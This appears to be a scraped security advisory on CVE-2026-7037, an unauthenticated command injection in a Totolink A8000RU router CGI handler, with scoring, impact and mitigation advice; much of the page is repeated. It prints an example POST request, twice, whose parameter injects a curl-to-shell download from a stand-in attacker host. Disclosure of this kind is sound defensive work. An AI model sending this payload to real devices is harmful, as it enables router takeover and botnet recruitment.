CVE-2026-7037: Unauthenticated OS Command Injection in Totolink A8000RU

Unauthenticated Remote Code Execution on Totolink Routers

A critical OS command injection vulnerability tracked as CVE-2026-7037 was published to the National Vulnerability Database (NVD) on April 26, 2026, affecting the Totolink A8000RU wireless router running firmware version 7.1cu.643_b20200521.

The flaw resides in the setVpnPassCfg function within /cgi-bin/cstecgi.cgi — the router's CGI request handler. The pptpPassThru argument is passed directly into a system call without sanitization, enabling an unauthenticated remote attacker to execute arbitrary OS commands with the privileges of the CGI process.

A public proof-of-concept exploit is available on GitHub. No official patch or vendor advisory from Totolink has been issued as of April 27, 2026.

Vulnerability Details

Detail	Value
CVE ID	CVE-2026-7037
CWE	CWE-78 — Improper Neutralization of Special Elements in an OS Command
CVSS 3.1	9.8 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS 4.0	9.3 Critical
Attack Vector	Network — unauthenticated, no user interaction required
Affected Component	`setVpnPassCfg` in `/cgi-bin/cstecgi.cgi`
Affected Parameter	`pptpPassThru`
Affected Version	Totolink A8000RU firmware `7.1cu.643_b20200521`
Published	April 26, 2026
Patch Available	No
PoC Available	Yes (public GitHub)
Exploited in Wild	No confirmed incidents; PoC availability elevates risk

How the Vulnerability Works

Root Cause: Unsanitized CGI Parameter

The setVpnPassCfg function processes the pptpPassThru argument from HTTP request parameters to configure VPN pass-through settings. The function passes the raw parameter value directly into a system call — no escaping, no validation, no filtering of shell metacharacters.

An attacker can inject arbitrary commands using standard shell injection patterns:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: <router_ip>
Content-Type: application/x-www-form-urlencoded
 
action=setVpnPassCfg&pptpPassThru=1;curl${IFS}attacker.example.com/shell.sh|sh

The injected command executes on the router's Linux-based OS under the privileges of the CGI handler process.

Why CVSS 9.8 (Critical)

The maximum-severity score is justified by all five CVSS base factors aligning to worst-case:

Factor	Value	Reason
Attack Vector	Network	Exploitable over the internet or LAN
Attack Complexity	Low	Trivial injection — no special conditions
Privileges Required	None	No authentication needed
User Interaction	None	Passive exploitation
Impact	High/High/High	Full C/I/A compromise

Impact Assessment

Impact Area	Description
Scope	Complete device compromise — arbitrary code execution as CGI process
Network exposure	Any device with the web interface exposed to untrusted networks
Lateral movement	Compromised router can intercept, redirect, and inspect all LAN traffic
Persistence	Attacker can install backdoors or modify firmware (subject to write access)
Home/SMB risk	Totolink A8000RU is a consumer/SMB device — users rarely apply firmware updates
Botnet recruitment	Router vulnerability of this class is a typical vector for Mirai-style IoT botnet recruitment

Recommendations

For Device Owners

Disable remote management — if the router admin interface is accessible from the WAN, disable this feature immediately in the router settings
Restrict admin interface to LAN only — ensure /cgi-bin/cstecgi.cgi is not reachable from untrusted networks
Check for firmware updates — monitor Totolink's official support page for a patched firmware release
Consider device replacement — this firmware version dates from 2020; devices on end-of-life firmware with critical unpatched CVEs should be replaced

For Security Teams

Scan for exposed Totolink A8000RU devices in your environment using asset inventory tools
Apply network segmentation — isolate routers and IoT devices on dedicated VLANs away from sensitive systems
Monitor for exploitation attempts — watch for unusual POST requests to /cgi-bin/cstecgi.cgi in WAF and perimeter logs
Track vendor patch — no official advisory has been issued; watch NVD and Totolink's site for updates

Key Takeaways

CVE-2026-7037 is a CVSS 9.8 Critical unauthenticated RCE exploitable by any attacker with network access to the device's web interface
No authentication is required — the pptpPassThru parameter is processed before any session validation
A public PoC exists on GitHub, dramatically lowering the bar for exploitation
No patch is available — mitigation is entirely defensive (firewall, network segmentation) until Totolink releases updated firmware
CWE-78 command injection in CGI handlers is a well-understood vulnerability class that continues to affect embedded and IoT devices
Totolink firmware 7.1cu.643_b20200521 dates from May 2020 — the device is likely running unsupported legacy firmware

Sources

Unauthenticated Remote Code Execution on Totolink Routers

A public proof-of-concept exploit is available on GitHub. No official patch or vendor advisory from Totolink has been issued as of April 27, 2026.

Vulnerability Details

Detail	Value
CVE ID	CVE-2026-7037
CWE	CWE-78 — Improper Neutralization of Special Elements in an OS Command
CVSS 3.1	9.8 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS 4.0	9.3 Critical
Attack Vector	Network — unauthenticated, no user interaction required
Affected Component	`setVpnPassCfg` in `/cgi-bin/cstecgi.cgi`
Affected Parameter	`pptpPassThru`
Affected Version	Totolink A8000RU firmware `7.1cu.643_b20200521`
Published	April 26, 2026
Patch Available	No
PoC Available	Yes (public GitHub)
Exploited in Wild	No confirmed incidents; PoC availability elevates risk

How the Vulnerability Works

Root Cause: Unsanitized CGI Parameter

An attacker can inject arbitrary commands using standard shell injection patterns:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: <router_ip>
Content-Type: application/x-www-form-urlencoded
 
action=setVpnPassCfg&pptpPassThru=1;curl${IFS}attacker.example.com/shell.sh|sh

The injected command executes on the router's Linux-based OS under the privileges of the CGI handler process.

Why CVSS 9.8 (Critical)

The maximum-severity score is justified by all five CVSS base factors aligning to worst-case:

Factor	Value	Reason
Attack Vector	Network	Exploitable over the internet or LAN
Attack Complexity	Low	Trivial injection — no special conditions
Privileges Required	None	No authentication needed
User Interaction	None	Passive exploitation
Impact	High/High/High	Full C/I/A compromise

Impact Assessment

Impact Area	Description
Scope	Complete device compromise — arbitrary code execution as CGI process
Network exposure	Any device with the web interface exposed to untrusted networks
Lateral movement	Compromised router can intercept, redirect, and inspect all LAN traffic
Persistence	Attacker can install backdoors or modify firmware (subject to write access)
Home/SMB risk	Totolink A8000RU is a consumer/SMB device — users rarely apply firmware updates
Botnet recruitment	Router vulnerability of this class is a typical vector for Mirai-style IoT botnet recruitment

Recommendations

For Device Owners

Disable remote management — if the router admin interface is accessible from the WAN, disable this feature immediately in the router settings
Restrict admin interface to LAN only — ensure /cgi-bin/cstecgi.cgi is not reachable from untrusted networks
Check for firmware updates — monitor Totolink's official support page for a patched firmware release
Consider device replacement — this firmware version dates from 2020; devices on end-of-life firmware with critical unpatched CVEs should be replaced

For Security Teams

Scan for exposed Totolink A8000RU devices in your environment using asset inventory tools
Apply network segmentation — isolate routers and IoT devices on dedicated VLANs away from sensitive systems
Monitor for exploitation attempts — watch for unusual POST requests to /cgi-bin/cstecgi.cgi in WAF and perimeter logs
Track vendor patch — no official advisory has been issued; watch NVD and Totolink's site for updates

Key Takeaways

CVE-2026-7037 is a CVSS 9.8 Critical unauthenticated RCE exploitable by any attacker with network access to the device's web interface
No authentication is required — the pptpPassThru parameter is processed before any session validation
A public PoC exists on GitHub, dramatically lowering the bar for exploitation
No patch is available — mitigation is entirely defensive (firewall, network segmentation) until Totolink releases updated firmware
CWE-78 command injection in CGI handlers is a well-understood vulnerability class that continues to affect embedded and IoT devices
Totolink firmware 7.1cu.643_b20200521 dates from May 2020 — the device is likely running unsupported legacy firmware

CVE-2026-7037: Unauthenticated OS Command Injection in Totolink A8000RU

Affected Products

Unauthenticated Remote Code Execution on Totolink Routers

Vulnerability Details

How the Vulnerability Works

Root Cause: Unsanitized CGI Parameter

Why CVSS 9.8 (Critical)

Impact Assessment

Recommendations

For Device Owners

For Security Teams

Key Takeaways

Sources

CVE-2026-6112: Totolink A7100RU OS Command Injection via setRadvdCfg

CVE-2026-6113: Totolink A7100RU OS Command Injection via setTtyServiceCfg

CVE-2026-6114: Totolink A7100RU OS Command Injection via setNetworkCfg

CVE-2026-7037: Unauthenticated OS Command Injection in Totolink A8000RU

Affected Products

Unauthenticated Remote Code Execution on Totolink Routers

Vulnerability Details

How the Vulnerability Works

Root Cause: Unsanitized CGI Parameter

Why CVSS 9.8 (Critical)

Impact Assessment

Recommendations

For Device Owners

For Security Teams

Key Takeaways

Sources

CVE-2026-6112: Totolink A7100RU OS Command Injection via setRadvdCfg

CVE-2026-6113: Totolink A7100RU OS Command Injection via setTtyServiceCfg

CVE-2026-6114: Totolink A7100RU OS Command Injection via setNetworkCfg